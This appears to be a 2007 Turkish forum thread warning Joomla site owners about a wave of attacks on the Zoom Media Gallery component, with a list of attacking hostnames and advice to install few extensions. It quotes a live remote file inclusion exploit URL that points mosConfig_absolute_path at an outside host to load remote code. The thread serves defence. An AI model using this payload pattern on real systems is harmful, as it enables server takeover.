PDA

Orijinalini görmek için tıklayınız : Dikkat Zoom Galeride Güncel Bir Açık Olabilir


memoc@n
17-04-2007, 22:40:58
Son bir saatte siteme yaklaşık 100 ayrı yerden exploit ve sql injection saldırısı yapılmakta bu da akla güncel bir açık bulunma olasılığını getirdi yoksa bu kadar yoğun olmazdı exploit zoom media gallery açığından yararlanmak adına düzenlenmiş ve sanıyorum güncel bir açık güvenlik önlemlerini almamış olan arkadaşlar ve özellikle zoom media galeri yüklüyse tedbirli olsunlar derim cmsturk te son ziyaretçilere panelden bakarsa girişim olmuştur diye düşünüyorum. Kullanılan adres aynen böyle http://www.xxxx.com/component/option,com_smf/Itemid,2/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://scikotics.com/c.in?? (http://joomladersleri.com/component/option,com_smf/Itemid,2/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://scikotics.com/c.in??)
Bende hem bu bileşen yüklü değil hem de güvenlik tedbirimiz var... Aciliyetinden şüphe ettiğimden yazayım dedim alelacele

memoc@n
17-04-2007, 22:43:17
Kullandıkları hostlar bunlar istatistiklerde bunları arayın yada com_zoom diye arayın istatistiklerde ortaya çıkar


ns32.hostinglmi.net
vs15.ilongo.at
s01060004aca672c5.wp.shawcable.net
xps14.microserver.de
siff.us.es
static-ip-62-75-193-86.inaddr.intergenia.de
pegasus.myboxnetplace.com
payfect-consumer.de
video02.unixowns.com
62-167-240-221.static.adslpremium.ch

ersen
17-04-2007, 23:09:16
Bu zoom bileşeni her sürüm de bir açıkla karşımıza çıkıyor. Açık olmayan eklentide bulmak zor. Her zaman ki gibi fazla eklenti kurmamanız en iyisi. Bilgi için teşekkürler.